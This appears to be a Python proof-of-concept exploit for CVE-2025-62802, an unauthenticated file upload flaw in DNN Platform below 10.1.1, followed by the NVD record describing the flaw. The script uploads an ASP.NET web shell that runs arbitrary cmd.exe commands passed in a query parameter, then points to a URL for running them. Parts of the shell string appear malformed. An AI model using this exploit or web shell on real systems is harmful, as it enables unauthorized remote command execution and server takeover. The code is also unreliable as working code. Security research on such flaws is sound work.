CVE-2025-62802

# CVE-2025-62802 PoC - DNN Platform Unauthenticated File Upload # Target: DNN Platform < 10.1.1 # Type: Unrestricted File Upload via HTML Editor import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com" # WebShell content to upload webshell = "<%@ Page Language="C#"%><%@ Import Namespace="System.IO"%><script runat="server">void Page_Load(object s,EventArgs e){string cmd=request.QueryString["cmd"];if(cmd!=null){Response.Write(\"<pre>\");Response.Write(new System.Diagnostics.Process(){StartInfo=new System.Diagnostics.ProcessStartInfo(\"cmd.exe\",\"/c \"+cmd){RedirectStandardOutput=true,UseShellExecute=false}}.Start().StandardOutput.ReadToEnd());Response.Write(\"</pre>\");Response.End();}}</script>" def exploit_cve_2025_62802(): print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Exploiting CVE-2025-62802: Unauthenticated File Upload") # Endpoint for HTML editor file upload upload_url = f"{TARGET_URL}/API/HTMLPro/Upload" files = { 'file': ('cmd.aspx', webshell, 'application/x-aspx') } data = { 'folder': '/Portals/0/', 'createNewFolder': 'false', 'overwrite': 'true' } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } try: print("[*] Sending malicious file upload request...") response = requests.post(upload_url, files=files, data=data, headers=headers, timeout=30) if response.status_code == 200: print("[+] File upload may have succeeded!") print(f"[+] Try accessing: {TARGET_URL}/Portals/0/cmd.aspx?cmd=whoami") else: print(f"[-] Response status: {response.status_code}") print(f"[-] Response: {response.text[:200]}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": exploit_cve_2025_62802()

{"cve": {"id": "CVE-2025-62802", "sourceIdentifier": "[email protected]", "published": "2025-10-28T22:15:38.087", "lastModified": "2025-11-03T19:38:00.530", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to 10.1.1, the out-of-box experience for HTML editing allows unauthenticated users to upload files. This opens a potential vector to other security issues and is not needed on most implementations. This vulnerability is fixed in 10.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}, {"lang": "en", "value": "CWE-1188"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.1.1", "matchCriteriaId": "AADA05D8-5532-4750-85C9-7B6F25E3BFD7"}]}]}], "references": [{"url": "https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-2374-6cvw-qmx6", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}